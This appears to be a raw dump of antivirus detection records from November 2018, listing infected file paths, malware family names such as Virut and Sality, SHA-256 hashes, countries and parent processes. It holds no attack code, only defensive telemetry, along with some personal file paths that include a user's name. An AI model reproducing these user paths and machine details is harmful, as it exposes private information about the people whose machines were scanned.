  Row(detection=Row(filename='avscan-20181101-191243-3eb95ffb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191243-3EB95FFB', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='7914e5b619e4d3e7025b498abde6e8d5bd5b716a0e9401148593e457b290b7ad', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-223550-d346cbd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d9803ab\\AVSCAN-20181031-223431-C8B49014\\AVSCAN-20181031-223550-D346CBD0', filesize=1344000, name='Adware/Zdengo.kykpb.#M1.#R1'), hash='79a642a6de1afadd3162f8bc38d4bab8c0835cdacc489ee0ab6523e591a1a16b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:35:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rhrwvhxqoey.dll', filepath='C:\\Windows\\Temp\\nsg36F3.tmp\\RhrWVHXqoey.dll', filesize=1344000, name='Adware/Zdengo.kykpb.#M1.#R1'), hash='79a642a6de1afadd3162f8bc38d4bab8c0835cdacc489ee0ab6523e591a1a16b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='F:\\Agus\\PortableApps\\EmsisoftEmergencyKitPortable\\App\\EmsisoftEmergencyKitPortable\\bin64\\a2emergencykit.exe', parentsize=10393728, timestamp='2018-11-01T01:33:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7a05b95674ef8ba86dd128bba104bafda98999b46e94ba3445b39da323bc3eae.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\7A05B95674EF8BA86DD128BBA104BAFDA98999B46E94BA3445B39DA323BC3EAE.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a05b95674ef8ba86dd128bba104bafda98999b46e94ba3445b39da323bc3eae', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:34:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160717-55cce896', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32ee4167\\AVSCAN-20181101-155117-C4BB2B44\\AVSCAN-20181101-160717-55CCE896', filesize=1024000, name='TR/Agent.7a0ca9.#M1.#R1'), hash='7a0ca978c03a0db12ffad1769e3b829118cdca74e4066e7e2ee83cf40cb53cf1', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7a0d925adb32d50186e7ffa895079a1a7f69a169b71c5ece4a9197e634663ae4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\7A0D925ADB32D50186E7FFA895079A1A7F69A169B71C5ECE4A9197E634663AE4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a0d925adb32d50186e7ffa895079a1a7f69a169b71c5ece4a9197e634663ae4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\Movies Toolbar\\Datamngr\\DatamngrUI.exe.vir', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='7a0dcdb58d4e5bbf303af3c6c5f9063ecfeb2e404d5797577234cd26d8be0b56', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:39:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='neditor.exe', filepath='\\\\?\\C:\\NIKAN_SOFT\\DIC2\\Narcis Soft\\Dictionary\\NEditor.exe', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='7a7d3337b058cbbf18b7d6583c2f985ba323eb175633b276d2180787258546a0', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:53:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='optional extensions.exe', filepath='E:\\programe\\Adobe Photoshop CS2 9.0 Final\\Goodies\\Optional Plug-Ins\\Photoshop Only\\Optional Extensions\\Optional Extensions.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='7a8726869171e4c384a7e1beebcddcf2f66be4ddf00c3eb0521d33aa0c670bdf', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7b0b0554abdba03487f36dc394f9976084d1202c1be0d7a1818c020a414106ec', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\7B0B0554ABDBA03487F36DC394F9976084D1202C1BE0D7A1818C020A414106EC', filesize=1920000, name='HEUR/AGEN.1032183.#M1.#R1'), hash='7b0b0554abdba03487f36dc394f9976084d1202c1be0d7a1818c020a414106ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r3.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX DEC. 2010\\R3.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='7b5e01a04445eada1618ef0eef6b883161ec945879bb217ac383c8ce7b1ba2f3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7b7b5901e37e97f942cba6debfb03a8f2300ba10e88ff528378a268b8920ae13', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\7B7B5901E37E97F942CBA6DEBFB03A8F2300BA10E88FF528378A268B8920AE13', filesize=1408000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='7b7b5901e37e97f942cba6debfb03a8f2300ba10e88ff528378a268b8920ae13', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T15:45:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7ba37c224b9b7e6c285e8a232471143ecd1804a9fa20498115f207294b2b6df7.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\7BA37C224B9B7E6C285E8A232471143ECD1804A9FA20498115F207294B2B6DF7.VIR', filesize=468000, name='Worm/Agent.2170901.#M1.#R1'), hash='7ba37c224b9b7e6c285e8a232471143ecd1804a9fa20498115f207294b2b6df7', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:35:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dlsloader.exe', filepath='D:\\DriverePC\\CompaqEvoD51S\\Audio_SP27103\\SoundMAX Synthesizer\\DLSLoader.exe', filesize=1024000, name='W32/Sality.Y.#M1.#R1'), hash='7ba62c021896a05d4a2d593915cb02a5db140c131ace98b289103112b9c76859', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:13:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220848-952a5d50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-220739-8B38A345\\AVSCAN-20181101-220848-952A5D50', filesize=1600000, name='TR/Patched.Ren.Gen4.#M1.#R1'), hash='7c8a842ab8047ece3e5dd6f562fdb8e680c0fb07ff04d3f220a25297cfc9e7f7', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:08:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220819-90ed6665', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-220739-8B38A345\\AVSCAN-20181101-220819-90ED6665', filesize=1600000, name='TR/Patched.Ren.Gen4.#M1.#R1'), hash='7c8a842ab8047ece3e5dd6f562fdb8e680c0fb07ff04d3f220a25297cfc9e7f7', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:08:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7cfb778aae830ce9b4b472a0011dbf5d232d49c8b6dca586593e248b887c8f02', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\7CFB778AAE830CE9B4B472A0011DBF5D232D49C8B6DCA586593E248B887C8F02', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='7cfb778aae830ce9b4b472a0011dbf5d232d49c8b6dca586593e248b887c8f02', metadata=Row(cmdline='-r', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T16:29:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mau ly lich trich ngang (1).exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Mau ly lich trich ngang (1).exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='7d5d2c613b9756c34903403e6e5c0f01efc402e1472ca198eb0a7534c354ead1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161310-dddb1862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161310-DDDB1862', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='7d5d2c613b9756c34903403e6e5c0f01efc402e1472ca198eb0a7534c354ead1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161551-eeabcc84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161551-EEABCC84', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='7d5d2c613b9756c34903403e6e5c0f01efc402e1472ca198eb0a7534c354ead1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192249-064c2a54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab16be44\\AVSCAN-20181101-184303-2E317741\\AVSCAN-20181101-192249-064C2A54', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='7d74dd61060c0c11796f1bc3fc48e0a061a002c9a049758d5d7bd1a2912e3f8e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233348-f8c775a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7426d2e\\AVSCAN-20181031-233120-EBE69076\\AVSCAN-20181031-233348-F8C775A5', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='7d74dd61060c0c11796f1bc3fc48e0a061a002c9a049758d5d7bd1a2912e3f8e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='7d80ce121b1fbadf55212514bc6bae4f16436b6a5a751853063ed9b4121c3530', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_isdel.exe', filepath='D:\\Discos utiles\\BMW6.5\\ENG\\_ISDel.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='7dfdae2dce9dc6bc97889f8f83e5d5de35651732b0df6b6ee346c86ed1058b16', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:42:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='umount.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-nfs-clientcmdtools_31bf3856ad364e35_6.1.7600.16385_none_5139b94651c5c307\\umount.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='7e2b2a8c6b77bd63ebc8bc619d700342891c096c16ea6610e371e073307dc7bf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='umount.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-nfs-clientcmdtools_31bf3856ad364e35_6.1.7600.16385_none_5139b94651c5c307\\umount.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='7e2b2a8c6b77bd63ebc8bc619d700342891c096c16ea6610e371e073307dc7bf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='launchu3.exe', filepath='E:\\LaunchU3.exe', filesize=1024000, name='W32/Sality.Y.#M1.#R1'), hash='7ebedb488a7522e84070a9473730feea56465f43e75f43f65b4134c42c3f34ef', metadata=Row(cmdline=None, country='YE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T18:13:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngtp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{EC6F2C17-FD0A-4CBB-BF5F-B973B9BA79FA}\\E_FARNGTP.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='7f0610e3ff3c1e082d0b9d2a2d844a1e351290ab2763e1585498df432561900c', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7f0c710258567a7e163382cacb4f2da179b03f463200aea7c6a5837ad786fd8a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\7F0C710258567A7E163382CACB4F2DA179B03F463200AEA7C6A5837AD786FD8A', filesize=192000, name='HEUR/AGEN.1005340.#M1.#R1'), hash='7f0c710258567a7e163382cacb4f2da179b03f463200aea7c6a5837ad786fd8a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:55:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='siemens.automation.remoteaccess.s7wtssvx.exe', filepath='\\\\?\\C:\\Program Files\\Siemens\\Automation\\Portal V13\\Bin\\Siemens.Automation.RemoteAccess.s7wtssvx.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='7f7774046fac5e4b5a36e752e6b4b4e9ce26c6c35e30bad14c87724d66203ebf', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:56:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='siemens.automation.remoteaccess.s7wtssvx.exe', filepath='C:\\Program Files\\Siemens\\Automation\\Portal V13\\Bin\\Siemens.Automation.RemoteAccess.s7wtssvx.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='7f7774046fac5e4b5a36e752e6b4b4e9ce26c6c35e30bad14c87724d66203ebf', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:40:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpasset.exe', filepath='C:\\Program Files\\Hewlett-Packard\\HP Health Check\\HPAsset\\HPAsset.exe', filesize=3952000, name='W32/Sality.AT.#M1.#R1'), hash='7fe6a23a62ec9dca8f893ca85d6576b58791eaf8da7ae450fb65f3168fb81e74', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:gWODU1xBt0SvMzGG.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-01T03:11:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='802460fbdc7e8d7eb493c9c70e1b858c1c038e1ef8f1d4c9d94941cc6457646a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\802460FBDC7E8D7EB493C9C70E1B858C1C038E1EF8F1D4C9D94941CC6457646A', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='802460fbdc7e8d7eb493c9c70e1b858c1c038e1ef8f1d4c9d94941cc6457646a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:43:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='802ae7db964f28d8551a9790853a114aa39eb8e8a7e2b14560058263708be652', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:32:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='802ae7db964f28d8551a9790853a114aa39eb8e8a7e2b14560058263708be652', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:48:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pg_config.exe', filepath='C:\\ManageEngine\\SupportCenter\\pgsql\\bin\\pg_config.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R5151'), hash='8075f81132cf522be54d082d9fa92bd5803395f4b384855ed9dd87466b39b900', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ykiT+3gxNUqfzPAm.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=81640, timestamp='2018-11-01T01:29:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-035940-4c13f152', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5de6c7eb\\AVSCAN-20181101-035539-196EC8EF\\AVSCAN-20181101-035940-4C13F152', filesize=832000, name='TR/Snarasite.807b68.#M1.#R1'), hash='807b6827c5a58b9bf1505ddd4556e81aa286e90a324b8d263f95e5a31e9fe122', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:59:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{C6E639E3-12B6-4CA3-BE05-00E533F97068}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='8084f671f775f9cc0ce1d51a565b15efcde2fb26f84a3b18999c44b0e76c1ecd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='80b2f42fdc9cbb8405968e675a6414ffb3278dfdfff040db266a3848913dbf76.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\80B2F42FDC9CBB8405968E675A6414FFB3278DFDFFF040DB266A3848913DBF76.VIR', filesize=256000, name='W2000M/Agent.756544.#M1.#R1'), hash='80b2f42fdc9cbb8405968e675a6414ffb3278dfdfff040db266a3848913dbf76', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:16:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104146-92360740', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_569ae788\\AVSCAN-20181101-102714-2CFE0F23\\AVSCAN-20181101-104146-92360740', filesize=2048000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='80dfbddd5388d86f949c93f0442541b686c50079c3b7f676ce1e4cb2ca848a30', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:41:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:04Z'), dt=datetime.date(2018, 11, 1)),
